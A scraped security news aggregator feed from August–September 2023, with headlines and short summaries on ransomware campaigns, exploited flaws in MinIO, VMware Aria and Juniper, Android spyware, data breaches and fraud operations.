            An attack that uses a database as an entry point to a network reminds us that you should never expose your databases to the Internet.

            The post FreeWorld ransomware attacks MSSQL—get your databases off the Internet appeared first on Malwarebytes Labs.

            Autosummary: MySQL and MariaDB often act as the source of data for websites, rather than as an enterprise data store like MSSQL, so may carry less business-critical data, but they still represent a prize, and a potential entry point into a network. As I mentioned before, one of the things that attracts attackers to RDP is the large number of available targets, so I wondered how many databases I could find via Shodan, the search engine that finds Internet-connected computers.


            Ransomware attacks go beyond just data

            exploits
            2023-09-04 https://www.helpnetsecurity.com/2023/09/04/ransomware-preparedness-strategies/

            65% of organizations confirmed that ransomware is one of the top three threats to their viability, and for 13%, it is the biggest threat, according to a report by Enterprise Strategy Group (ESG) and Keepit. Organizations’ strategies against ransomware According to the report’s findings, while ransomware attacks are sometimes kept private from the public, they are a common occurrence and represent both a significant and recurring source of business disruption. Among the 600 respondents, only … More

            Autosummary: “Of the companies in the ESG study that reported that they had experienced a successful ransomware attack and paid the ransom, 85% experienced additional extortion attempts, and 57% paid the additional fees beyond the initial ransomware demand,” Ostergaard continued.


            Deep Instinct takes a prevention-first approach to stopping ransomware and other malware using deep learning

            exploits ransomware
            2023-09-04 https://grahamcluley.com/feed-sponsor-deep-instinct/
            Graham Cluley Security News is sponsored this week by the folks at Deep Instinct. Thanks to the great team there for their support! Deep Instinct protects the data of the world’s largest brands by delivering on the promise of threat prevention with the only cybersecurity platform fully powered by Deep Learning. We have pioneered predictive … Continue reading "Deep Instinct takes a prevention-first approach to stopping ransomware and other malware using deep learning"


            Vietnamese Cybercriminals Targeting Facebook Business Accounts with Malvertising

            ciber
            2023-09-04 https://thehackernews.com/2023/09/vietnamese-cybercriminals-targeting.html
            Malicious actors associated with the Vietnamese cybercrime ecosystem are leveraging advertising-as-a-vector on social media platforms such as Meta-owned Facebook to distribute malware. “Threat actors have long used fraudulent ads as a vector to target victims with scams, malvertising, and more,” WithSecure researcher Mohammad Kazem Hassan Nejad said. “And with businesses now leveraging the reach

            Autosummary: "The Vietnamese-centric element of these threats and high degree of overlaps in terms of capabilities, infrastructure, and victimology suggests active working relationships between various threat actors, shared tooling and TTPs across these threat groups, or a fractured and service-oriented Vietnamese cybercriminal ecosystem (akin to ransomware-as-a-service model) centered around social media platforms such as Facebook," WithSecure said. An element that's common to these groups is the abuse of URL shortener services, Telegram for command-and-control (C2), and legitimate cloud services like Trello, Discord, Dropbox, iCloud, OneDrive, and Mediafire to host the malicious payloads.


            Hackers Exploit MinIO Storage System Vulnerabilities to Compromise Servers

            exploits
            2023-09-04 https://thehackernews.com/2023/09/hackers-exploit-minio-storage-system.html
            An unknown threat actor has been observed weaponizing high-severity security flaws in the MinIO high-performance object storage system to achieve unauthorized code execution on affected servers. Cybersecurity and incident response firm Security Joes said the intrusion leveraged a publicly available exploit chain to backdoor the MinIO instance. The chain comprises CVE-2023-28432 (CVSS score: 7.5) and

            Autosummary: The chain comprises CVE-2023-28432 (CVSS score: 7.5) and CVE-2023-28434 (CVSS score: 8.8), the former of which was added to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities (KEV) catalog on April 21, 2023.


            Chinese-Speaking Cybercriminals Launch Large-Scale iMessage Smishing Campaign in U.S.

            financial ciber
            2023-09-04 https://thehackernews.com/2023/09/chinese-speaking-cybercriminals-launch.html
            A new large-scale smishing campaign is targeting the U.S. by sending iMessages from compromised Apple iCloud accounts with an aim to conduct identity theft and financial fraud. “The Chinese-speaking threat actors behind this campaign are operating a package-tracking text scam sent via iMessage to collect personally identifying information (PII) and payment credentials from victims, in the

            Autosummary: These kits impersonate popular postal and delivery services in the U.S., the U.K., Poland, Sweden, Italy, Indonesia, Malaysia, Japan, and other countries.


            Freecycle confirms massive data breach impacting 7 million users

            financial
            2023-09-04 https://www.bleepingcomputer.com/news/security/freecycle-confirms-massive-data-breach-impacting-7-million-users/
            Freecycle, an online forum dedicated to exchanging used items rather than trashing them, confirmed a massive data breach that affected more than 7 million users. [...]


            German financial agency site disrupted by DDoS attack since Friday

            financial
            2023-09-04 https://www.bleepingcomputer.com/news/security/german-financial-agency-site-disrupted-by-ddos-attack-since-friday/
            The German Federal Financial Supervisory Authority (BaFin) announced today that an ongoing distributed denial-of-service (DDoS) attack has been impacting its website since Friday. [...]


            Hackers exploit MinIO storage system to breach corporate networks

            exploits
            2023-09-04 https://www.bleepingcomputer.com/news/security/hackers-exploit-minio-storage-system-to-breach-corporate-networks/
            Hackers are exploiting two recent MinIO vulnerabilities to breach object storage systems and access private information, execute arbitrary code, and potentially take over servers. [...]

            Autosummary: The payloads are downloaded on Linux via "curl" or "wget" and on Windows via "winhttpjs.bat" or "bitsadmin," and include the following: System profiling script – collects system information like user details, memory, cronjobs, and disk usage. The two vulnerabilities found chained in attacks by Security Joes' incident responders are CVE-2023-28432 and CVE-2023-28434, two high-severity issues impacting all MinIO versions before RELEASE.2023-03-20T20-16-18Z. The two vulnerabilities were disclosed and fixed by the vendor on March 3, 2023.


            PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability

            exploits
            2023-09-03 https://thehackernews.com/2023/09/poc-exploit-released-for-critical.html
            Proof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight). The flaw, tracked as CVE-2023-34039, is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation. “A


            Championing cybersecurity regulatory affairs with Nidhi Gani

            ciber
            2023-09-03 https://www.helpnetsecurity.com/2023/09/03/nidhi-gani-cybersecurity-regulatory-affairs/

            Nidhi Gani is a seasoned regulatory affairs professional with over a decade of experience in cybersecurity, medical devices, and digital health. She’s worked with devices ranging from heart and lung machines to rehabilitation devices. Nidhi works at Embecta as a Regulatory Affairs Software and Cybersecurity and is a Cybersecurity Fellow at the Archimedes Center for Health Care and Medical Device Cybersecurity at Northeastern University. She joined the Left to Our Own Devices podcast to share … More

            Autosummary: Looking beyond the United States to how other countries are working on their own measures, Nidhi said: “I think most countries and continents are following suit and producing their own cybersecurity regulations and AI SMD regulations because technology has been moving forward after the pandemic, or rather, it has accelerated the growth by at least a decade, and the regulators are catching up and they’re doing a good job.” Regulatory Affairs as a strategic partner In the earlier years of her career, before the FDA’s Pre-Market guidelines for cybersecurity, the cooperation between teams and regulatory affairs professionals was challenging. Nidhi leans on the strength of Product Security Management Systems, where vulnerabilities, risks, and other security-related challenges can be discovered and managed.


            Week in review: 11 search engines for cybersecurity research, PoC for RCE in Juniper firewall released

            ciber
            2023-09-03 https://www.helpnetsecurity.com/2023/09/03/week-in-review-11-search-engines-for-cybersecurity-research-poc-for-rce-in-juniper-firewall-released/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Adapting authentication to a cloud-centric landscape In this Help Net Security interview, Florian Forster, CEO at Zitadel, discusses the challenges CISOs face in managing authentication across increasingly distributed and remote workforces, the negative consequences of ineffective authorization, and how the shift toward cloud transformation affects authentication strategies. What makes a good ASM solution stand out In this Help Net Security … More

            Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Adapting authentication to a cloud-centric landscape In this Help Net Security interview, Florian Forster, CEO at Zitadel, discusses the challenges CISOs face in managing authentication across increasingly distributed and remote workforces, the negative consequences of ineffective authorization, and how the shift toward cloud transformation affects authentication strategies. What true diversity in the cybersecurity industry looks like In this Help Net Security video, Larry Whiteside, Jr., CISO at RegScale and President of Cyversity, discusses how, now more than ever, the cybersecurity industry needs the diversity of thought to address the increasingly complex and technology-driven challenges organizations face.


            University of Sydney data breach impacts recent applicants

            financial
            2023-09-03 https://www.bleepingcomputer.com/news/security/university-of-sydney-data-breach-impacts-recent-applicants/
            The University of Sydney (USYD) has announced it has suffered a data breach through a third-party service provider, exposing the personal data of recently applied and enrolled international applicants. [...]


            New ‘YouPorn’ sextortion scam threatens to leak your sex tape

            financial
            2023-09-02 https://www.bleepingcomputer.com/news/security/new-youporn-sextortion-scam-threatens-to-leak-your-sex-tape/
            A new sextortion scam is making the rounds that pretends to be an email from the adult site YouPorn, warning that a sexually explicit video of you was uploaded to the site and suggesting you pay to have it taken down. [...]

            Autosummary: Since then, threat actors have created various email extortion scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, threats of installing ransomware, and threats to infect your family with Coronavirus.


            Freecycle users told to change passwords after data breach

            financial
            2023-09-02 https://grahamcluley.com/freecycle-users-told-to-change-passwords-after-data-breach/
            Freecycle, an online community that encourages sharing unwanted items with each other rather than chucking them in the bin or taking them to landfill, has told users to change their passwords after it suffered a data breach.

            Autosummary: Deron Beal, Executive Director, The Freecycle Network More information is shared on the Freecycle knowledgebase, where users are advised on how to change their passwords.


            Fake YouPorn extortion scam threatens to leak your sex tape

            financial
            2023-09-02 https://www.bleepingcomputer.com/news/security/fake-youporn-extortion-scam-threatens-to-leak-your-sex-tape/
            A new sextortion scam is making the rounds that pretends to be an email from the adult site YouPorn, warning that a sexually explicit video of you was uploaded to the site and suggesting you pay to have it taken down. [...]

            Autosummary: Since then, threat actors have created various email extortion scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, threats of installing ransomware, and threats to infect your family with Coronavirus.


            Cybercriminals use research contests to create new attack methods

            ciber
            2023-09-01 https://www.helpnetsecurity.com/2023/09/01/cybercriminal-forums-contests/

            Adversary-sponsored research contests on cybercriminal forums focus on new methods of attack and evasion, according to Sophos. The contests mirror legitimate security conference ‘Call For Papers’ and provide the winners considerable financial rewards and recognition from peers and also potential jobs. As outlined in Sophos X-Ops' latest report, these contests are designed to drive innovation, and when analyzed, the entries provide invaluable insight into how cybercriminals attempt to overcome security obstacles. The evolution of criminal … More

            Autosummary: Latest trends in cyber competitions Sophos X-Ops explored two prominent annual contests: one run by the Russian-language cybercrime forum Exploit, offering a total prize fund of $80,000 to the winner of its contest in 2021, and another run on the XSS forum, with a prize pool of $40,000 in 2022.


            Russian State-Backed "Infamous Chisel" Android Malware Targets Ukrainian Military

            exploits government rusia-ucrania
            2023-09-01 https://thehackernews.com/2023/09/russian-state-backed-infamous-chisel.html
            Cybersecurity and intelligence agencies from Australia, Canada, New Zealand, the U.K., and the U.S. on Thursday disclosed details of a mobile malware strain targeting Android devices used by the Ukrainian military. The malicious software, dubbed Infamous Chisel and attributed to a Russian state-sponsored actor called Sandworm, has capabilities to “enable unauthorized access to compromised

            Autosummary: A brief description of each of the modules is as follows: netd - Collate and exfiltrate information from the compromised device at set intervals, including from app-specific directories and web browsers; td - Provide TOR services; blob - Configure Tor services and check network connectivity (executed by netd); tcpdump - Legitimate tcpdump utility with no modifications; killer - Terminate the netd process; db - Contains several tools to copy files and provide secure shell access to the device via the TOR hidden service using a modified version of Dropbear; NDBR - A multi-call binary similar to db that comes in two flavors to be able to run on Arm (ndbr_armv7l) and Intel (ndbr_i686) CPU architectures. Persistence on the device is achieved by replacing the legitimate netd daemon, which is responsible for network configuration on Android, with a rogue version, enabling it to execute commands as the root user.


            New SuperBear Trojan Emerges in Targeted Phishing Attack on South Korean Activists

            financial exploits
            2023-09-01 https://thehackernews.com/2023/09/new-superbear-trojan-emerges-in.html
            A new phishing attack likely targeting civil society groups in South Korea has led to the discovery of a novel remote access trojan called SuperBear. The intrusion singled out an unnamed activist, who was contacted in late August 2023 and received a malicious LNK file from an address impersonating a member of the organization, non-profit entity Interlabs said in a new report. The LNK file, upon


            It's a Zero-day? It's Malware? No! It's Username and Password

            exploits
            2023-09-01 https://thehackernews.com/2023/09/its-zero-day-its-malware-no-its.html
            As cyber threats continue to evolve, adversaries are deploying a range of tools to breach security defenses and compromise sensitive data. Surprisingly, one of the most potent weapons in their arsenal is not malicious code but simply stolen or weak usernames and passwords. This article explores the seriousness of compromised credentials, the challenges they present to security solutions, and the

            Autosummary: Silverfort Unified Identity Protection provides robust protection by implementing MFA on every authentication within AD, including legacy applications, command-line access to workstations and servers, file shares, and any NTLM, Kerberos, or LDAP authentication. Empowering Active Directory Security with Silverfort Unified Identity Protection To counter the misuse of compromised credentials in AD environments, organizations need a comprehensive security solution that offers continuous monitoring, risk analysis, and active response.


            Classiscam Scam-as-a-Service Raked $64.5 Million During the COVID-19 Pandemic

            financial
            2023-09-01 https://thehackernews.com/2023/09/classiscam-scam-as-service-raked-645.html
            The Classiscam scam-as-a-service program has reaped the criminal actors $64.5 million in illicit earnings since its emergence in 2019. "Classiscam campaigns initially started out on classified sites, on which scammers placed fake advertisements and used social engineering techniques to convince users to pay for goods by transferring money to bank cards," Group-IB said in a new report. "Since

            Autosummary: Supercharge Your Skills As stealer families become more robust, multifaceted, and accessible, they not only lower the barrier to entry into financially motivated cyber crime, but also act as a precursor for ransomware, espionage, and other post-compromise mission objectives. Some victims have been subjected to forced labor, sexual violence, torture, cruel punishments, and arbitrary detention, among other crimes, it said.


            Golf gear giant Callaway data breach exposes info of 1.1 million

            financial
            2023-09-01 https://www.bleepingcomputer.com/news/security/golf-gear-giant-callaway-data-breach-exposes-info-of-11-million/
            Topgolf Callaway (Callaway) suffered a data breach at the start of August, which exposed the sensitive personal and account data of more than a million customers. [...]


            Threat Actors Targeting Microsoft SQL Servers to Deploy FreeWorld Ransomware

            exploits ransomware
            2023-09-01 https://thehackernews.com/2023/09/threat-actors-targeting-microsoft-sql.html
            Threat actors are exploiting poorly secured Microsoft SQL (MS SQL) servers to deliver Cobalt Strike and a ransomware strain called FreeWorld. Cybersecurity firm Securonix, which has dubbed the campaign DB#JAMMER, said it stands out for the way the toolset and infrastructure is employed. “Some of these tools include enumeration software, RAT payloads, exploitation and credential stealing software

            Autosummary: "Some of these tools include enumeration software, RAT payloads, exploitation and credential stealing software, and finally ransomware payloads," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical breakdown of the activity.


            Exploit released for critical VMware SSH auth bypass vulnerability

            exploits
            2023-09-01 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-vmware-ssh-auth-bypass-vulnerability/
            Proof-of-concept exploit code has been released for a critical SSH authentication bypass vulnerability in VMware's Aria Operations for Networks analysis tool (formerly known as vRealize Network Insight). [...]

            Autosummary: CVE-2023-34039 PoC exploit (Sina Kheirkhah) VMware also patched an arbitrary file write vulnerability this week (CVE-2023-20890), which allows attackers to gain remote code execution after obtaining admin access to the targeted appliance (the CVE-2023-34039 PoC could let them get root permissions following successful attacks).


            Smashing Security podcast #337: The DEA’s crypto calamity, and scammers’ blue tick bonanza

            financial
            2023-08-31 https://grahamcluley.com/smashing-security-podcast-337/
            Seized cryptocurrency is stolen from the DEA, blue-ticks are being exploited, a bath full of dollar bills, the comfort offered by an ostrich’s head, and how Graham is refusing to call Twitter “X”. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

            Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps.


            The power of passive OS fingerprinting for accurate IoT device identification

            industry
            2023-08-31 https://www.helpnetsecurity.com/2023/08/31/passive-os-fingerprinting/

            The number of IoT devices in enterprise networks and across the internet is projected to reach 29 billion by the year 2030. This exponential growth has inadvertently increased the attack surface. Each interconnected device can potentially create new avenues for cyberattacks and security breaches. The Mirai botnet demonstrated just that, by using thousands of vulnerable IoT devices to launch massive DDoS attacks on critical internet infrastructure and popular websites. To effectively safeguard against the risks … More

            Autosummary: Converging networking and security functions can allow automated collection and correlation of networking and security data from multiple sources, such as intrusion detection systems, firewall logs, and endpoint security solutions, to provide an overview of network activity and its relation to operating systems and IoT devices. Different operating systems implement TCP/IP attributes differently and may have unique values for TCP/IP fields, such as the initial time to live (TTL), window size, TCP flags, and more.


            Trojanized Signal, Telegram apps found on Google Play, Samsung Galaxy Store

            exploits
            2023-08-31 https://www.helpnetsecurity.com/2023/08/31/fake-signal-telegram-apps/

            ESET researchers have identified two active campaigns targeting Android users, where the threat actors behind the tools for Telegram and Signal are attributed to the China-aligned APT group GREF. Most likely active since July 2020 and since July 2022, respectively for each malicious app, the campaigns have distributed the Android BadBazaar espionage code through the Google Play store, Samsung Galaxy Store, and dedicated websites posing as legitimate encrypted chat applications — the malicious apps are … More

            Autosummary: ESET telemetry reports detections from Australia, Brazil, Denmark, the Democratic Republic of the Congo, Germany, Hong Kong, Hungary, Lithuania, the Netherlands, Poland, Portugal, Singapore, Spain, Ukraine, the United States, and Yemen.


            Earth Estries' Espionage Campaign Targets Governments and Tech Titans Across Continents

            government ransomware
            2023-08-31 https://thehackernews.com/2023/08/earth-estries-espionage-campaign.html
            A hacking outfit nicknamed Earth Estries has been attributed to a new, ongoing cyber espionage campaign targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. "The threat actors behind Earth Estries are working with high-level resources and functioning with sophisticated skills and experience in cyber espionage and illicit


            GRU hackers attack Ukrainian military with new Android malware

            exploits
            2023-08-31 https://www.bleepingcomputer.com/news/security/gru-hackers-attack-ukrainian-military-with-new-android-malware/
            Hackers working for the Main Directorate of the General Staff of the Armed Forces of the Russian Federation, more commonly known as the GRU, have been targeting Android devices in Ukraine with a new malicious framework named "Infamous Chisel". [...]

            Autosummary: Filetypes targeted by the malware (NCSC) Android's /data/ directory is scanned for applications like Google Authenticator, OpenVPN Connect, PayPal, Viber, WhatsApp, Signal, Telegram, Gmail, Chrome, Firefox, Brave, Microsoft One Cloud, Android Contacts, and many more.


            Classiscam fraud-as-a-service expands, now targets banks and 251 brands

            financial
            2023-08-31 https://www.bleepingcomputer.com/news/security/classiscam-fraud-as-a-service-expands-now-targets-banks-and-251-brands/
            The "Classiscam" scam-as-a-service operation has broadened its reach worldwide, targeting many more brands, countries, and industries, causing more significant financial damage than before. [...]

            Autosummary: Balance check step supposedly part of user verification (Group-IB) Group-IB's analysts have seen 35 scam groups using phishing sites that mimic the login pages of 63 banks in 14 countries, including financial institutes in Belgium, Canada, Czech Republic, France, Germany, Poland, Singapore, and Spain.


            Another data breach at Forever 21 leaks details of 500,000 current and former employees

            financial
            2023-08-31 https://www.bitdefender.com/blog/hotforsecurity/another-data-breach-at-forever-21-leaks-details-of-500-000-current-and-former-employees/
Fashion chain Forever 21 has suffered what it has described as a "data security incident" that saw a hacker gain access to its systems for months, and exposed the personal details of 539,207 current and former employees. Read more in my article on the Hot for Security blog.


            PagerDuty strengthens analytics capabilities and expands generative AI offerings

            industry
            2023-08-31 https://www.helpnetsecurity.com/2023/08/31/pagerduty-runbook-automation/

            PagerDuty introduced AI-generated runbooks in early access, as well as new analytics capabilities for the PagerDuty Operations Cloud. Using PagerDuty Runbook Automation from the Operations Cloud, customers replace manual procedures with automated self-service workflows, potentially saving hundreds of working days per year. With PagerDuty’s new generative AI capabilities, customers could realize hundreds of thousands of dollars in annual operational cost savings by using natural-language prompts paired with prompt-engineering automation–high quality prompts iteratively guiding users–to initiate … More

            The post PagerDuty strengthens analytics capabilities and expands generative AI offerings appeared first on Help Net Security.

Autosummary: This new feature in PagerDuty Runbook Automation is the latest in a series of PagerDuty’s GenAI capabilities, which will be available across the PagerDuty Operations Cloud to help organizations automate time-critical, high-impact work, improve productivity and meaningfully reduce operating costs in uncertain economic times.


            Cisco VPNs with no MFA enabled hit by ransomware groups

            exploits ransomware
            2023-08-31 https://www.helpnetsecurity.com/2023/08/31/ransomware-cisco-vpn/

            Since March 2023 (and possibly even earlier), affiliates of the Akira and LockBit ransomware operators have been breaching organizations via Cisco ASA SSL VPN appliances. “In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via … More


            SapphireStealer Malware: A Gateway to Espionage and Ransomware Operations

            exploits ransomware
            2023-08-31 https://thehackernews.com/2023/08/sapphirestealer-malware-gateway-to.html
An open-source .NET-based information stealer malware dubbed SapphireStealer is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants. “Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional


Numbers Don't Lie: Exposing the Harsh Truths of Cyberattacks in New Report

            ciber
            2023-08-31 https://thehackernews.com/2023/08/numbers-dont-lie-exposing-harsh-truths.html
How often do cyberattacks happen? How frequently do threat actors target businesses and governments around the world? The BlackBerry® Threat Research and Intelligence Team recently analyzed 90 days of real-world data to answer these questions. Full results are in the latest BlackBerry Global Threat Intelligence Report, but read on for a teaser of several interesting cyber attack statistics.

Autosummary: 90 Days of Cyberattacks: based on analysis of cyberattacks detected and blocked during the 90-day window, the BlackBerry Threat Research and Intelligence Team recorded the following statistics: total number of malware-based attacks: 1,578,733; number of unique attacks (using previously undetected malware): 200,454; average number of cyberattacks per day: 17,280; average number of cyberattacks per hour: 720; average number of attacks per minute: 12; average number of new malware variants per minute: 1.5. The latest report also analyzes changes in the velocity of cyberattacks detected during this period. The most-targeted industries during the study period included: financial institutions; healthcare services and equipment, including hospitals, clinics, and medical devices; food and staples retailers, including supermarkets, drugstores, and companies that sell food products to other businesses. The report found these vertical industries accounted for 60% of the overall number of attacks.


            LogicMonitor customers hacked in reported ransomware attacks

            exploits ransomware
            2023-08-31 https://www.bleepingcomputer.com/news/security/logicmonitor-customers-hacked-in-reported-ransomware-attacks/
Network monitoring company LogicMonitor confirmed today that certain customers of its SaaS platform have fallen victim to cyberattacks linked to ransomware. [...]

Autosummary: LogicMonitor account access issues (BleepingComputer). Customers hacked because of weak, default passwords: another anonymous source told TechCrunch that the affected customers' accounts were hacked using default weak passwords assigned by LogicMonitor to new users.


            Free Key Group ransomware decryptor helps victims recover data

            exploits ransomware
            2023-08-31 https://www.bleepingcomputer.com/news/security/free-key-group-ransomware-decryptor-helps-victims-recover-data/
Researchers took advantage of a weakness in the encryption scheme of Key Group ransomware and developed a decryption tool that lets some victims recover their files for free. [...]

Autosummary: Vulnerable function (left), static key (right) (EclecticIQ). Key Group profile: Key Group is a Russian-speaking threat actor that sprang into action in early 2023, attacking various organizations, stealing data from compromised systems, and then using private Telegram channels to negotiate ransom payments.


            Forever 21 data breach: hackers accessed info of 500,000

            financial
            2023-08-31 https://www.bleepingcomputer.com/news/security/forever-21-data-breach-hackers-accessed-info-of-500-000/
Forever 21 clothing and accessories retailer is sending data breach notifications to more than half a million individuals who had their personal information exposed to network intruders. [...]


            Velociraptor: Open-source digital forensics and incident response

            industry
            2023-08-30 https://www.helpnetsecurity.com/2023/08/30/velociraptor-open-source-digital-forensics-incident-response/

            Velociraptor is a sophisticated digital forensics and incident response tool designed to improve your insight into endpoint activities. Velociraptor enables you to conduct precise and rapid collection of digital forensic data across multiple endpoints simultaneously. Persistently gather events from endpoints, including event logs, file changes, and process activities. Store these events centrally for an unlimited period, allowing for historical examination and analysis. Be proactive rather than reactive. You can use a collection of forensic artifacts … More


            FBI Dismantles QakBot Malware, Frees 700,000 Computers, Seizes $8.6 Million

            exploits
            2023-08-30 https://thehackernews.com/2023/08/fbi-dismantles-qakbot-malware-frees.html
A coordinated law enforcement effort codenamed Operation Duck Hunt has felled QakBot, a notorious Windows malware family that's estimated to have compromised over 700,000 computers globally and facilitated financial fraud as well as ransomware. To that end, the U.S. Justice Department (DoJ) said the malware is "being deleted from victim computers, preventing it from doing any more harm," adding

Autosummary: The cross-border exercise involved the participation of France, Germany, Latvia, Romania, the Netherlands, the U.K., and the U.S., alongside technical assistance from cybersecurity company Zscaler.


            Japan’s cybersecurity agency admits it was hacked for months

            ciber
            2023-08-30 https://www.bitdefender.com/blog/hotforsecurity/japans-cybersecurity-agency-admits-it-was-hacked-for-months/
Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC), the agency responsible for the nation's defences against cyber attacks, has itself been hacked. Read more in my article on the Hot for Security blog.


            VMware fixes critical vulnerability in Aria Operations for Networks (CVE-2023-34039)

            exploits
            2023-08-30 https://www.helpnetsecurity.com/2023/08/30/cve-2023-34039/

            VMware has patched one critical (CVE-2023-34039) and one high-severity vulnerability (CVE-2023-20890) in Aria Operations for Networks, its popular enterprise network monitoring tool. About the vulnerabilities (CVE-2023-34039, CVE-2023-20890) CVE-2023-34039 is a network bypass vulnerability arising as a result of a lack of unique cryptographic key generation. It could allow an attacker with network access to Aria Operations for Networks to bypass SSH authentication to gain access to the Aria Operations for Networks command-line interface (CLI). CVE-2023-20890 … More


            Critical Vulnerability Alert: VMware Aria Operations Networks at Risk from Remote Attacks

            exploits
            2023-08-30 https://thehackernews.com/2023/08/critical-vulnerability-alert-vmware.html
            VMware has released software updates to correct two security vulnerabilities in Aria Operations for Networks that could be potentially exploited to bypass authentication and gain remote code execution. The most severe of the flaws is CVE-2023-34039 (CVSS score: 9.8), which relates to a case of authentication bypass arising as a result of a lack of unique cryptographic key generation. "A "


            Alert: Juniper Firewalls, Openfire, and Apache RocketMQ Under Attack from New Exploits

            exploits
            2023-08-30 https://thehackernews.com/2023/08/alert-juniper-firewalls-openfire-and.html
Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports. The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth_operation.php endpoint," the same day a proof-of-concept (PoC)

Autosummary: The issues, tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847, reside in the J-Web component of Junos OS on Juniper SRX and EX Series.


            WordPress migration add-on flaw could lead to data breaches

            financial
            2023-08-30 https://www.bleepingcomputer.com/news/security/wordpress-migration-add-on-flaw-could-lead-to-data-breaches/
All-in-One WP Migration, a popular data migration plugin for WordPress sites that has 5 million active installations, suffers from unauthenticated access token manipulation that could allow attackers to access sensitive site information. [...]


            Trojanized Signal and Telegram apps on Google Play delivered spyware

            exploits
            2023-08-30 https://www.bleepingcomputer.com/news/security/trojanized-signal-and-telegram-apps-on-google-play-delivered-spyware/
Trojanized Signal and Telegram apps containing the BadBazaar spyware were uploaded onto Google Play and Samsung Galaxy Store by a Chinese APT hacking group known as GREF. [...]

Autosummary: This malware was previously used to target ethnic minorities in China, but ESET's telemetry shows that this time, the attackers target users in Ukraine, Poland, the Netherlands, Spain, Portugal, Germany, Hong Kong, and the United States.


            Hackers Can Exploit Windows Container Isolation Framework to Bypass Endpoint Security

            exploits
            2023-08-30 https://thehackernews.com/2023/08/hackers-can-exploit-windows-container.html
New findings show that malicious actors could leverage a sneaky malware detection evasion technique and bypass endpoint security solutions by manipulating the Windows Container Isolation Framework. The findings were presented by Deep Instinct security researcher Daniel Avinoam at the DEF CON security conference held earlier this month. Microsoft's container architecture (and by extension,

Autosummary: In other words, the idea is to have the current process running inside a fabricated container and leverage the minifilter driver to handle I/O requests such that it can create, read, write, and delete files on the file system without alerting security software.


            MMRat Android Trojan Executes Remote Financial Fraud Through Accessibility Feature

            financial exploits
            2023-08-30 https://thehackernews.com/2023/08/mmrat-android-trojan-executes-remote.html
A previously undocumented Android banking trojan dubbed MMRat has been observed targeting mobile users in Southeast Asia since late June 2023 to remotely commandeer the devices and perform financial fraud. "The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling

Autosummary: "The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling its operators to carry out bank fraud on the victim's device," Trend Micro said.


            Paramount discloses data breach following security incident

            financial
            2023-08-30 https://www.bleepingcomputer.com/news/security/paramount-discloses-data-breach-following-security-incident/
American entertainment giant Paramount Global disclosed a data breach after its systems got hacked and attackers gained access to personally identifiable information (PII). [...]


            Social Security Numbers leaked in ransomware attack on Ohio History Connection

            exploits ransomware
            2023-08-30 https://www.malwarebytes.com/blog/news/2023/08/social-security-numbers-leaked-in-ransomware-attack-on-ohio-history-connection

Categories: News, Ransomware

Tags: Ohio History Connection, ransomware, LockBit, SSN, phishing

            Ohio History Connection acknowledged that in a ransomware attack the attackers may have had access to 7,600 SSNs.

Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. During the attack, the cybercriminals may have had access to names, addresses, and Social Security Numbers (SSNs) of current and former OHC employees (from 2009 to 2023). Screenshot taken early August 2023. OHC said that it made an offer to the cybercriminals to prevent the release of the data, but the offer was rejected on August 7, 2023.


            Is the cybersecurity community’s obsession with compliance counter-productive?

            ciber
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/compliance-standards/

            Does anyone think the chances of surviving a plane crash increase if our tray tables are locked and our carry-on bags are completely stowed under our seats? That we’ll be OK if the plane hits a mountain if we have our seat belts buckled securely across our waists? Not even the flight attendants, who will be responsible for throwing us off the plane if we don’t comply, really believe those rituals make us safer. And … More

Autosummary: To wit: Manager Information Security and Compliance, Manager, Security and Compliance Advisory, Senior Manager Internal Controls and Compliance, Sr. Manager – IT Security & Compliance (among others). Premera Blue Cross (HIPAA), CareFirst BCBS (HIPAA), SolarWinds (NIST CSF). This is, of course, not an exhaustive list.


            11 search engines for cybersecurity research you can use right now

            ciber
            2023-08-29 https://www.helpnetsecurity.com/2023/08/29/search-engines-cybersecurity-research/

            Staying ahead in cybersecurity requires constant learning and adaptation. If you’re interested in cybersecurity research, explore the resources outlined below. DNSdumpster DNSdumpster is a free domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers’ perspective is an important part of the security assessment process. Exploit Database Exploit Database is a CVE-compliant archive of public exploits and corresponding vulnerable software developed for use by penetration testers and vulnerability … More

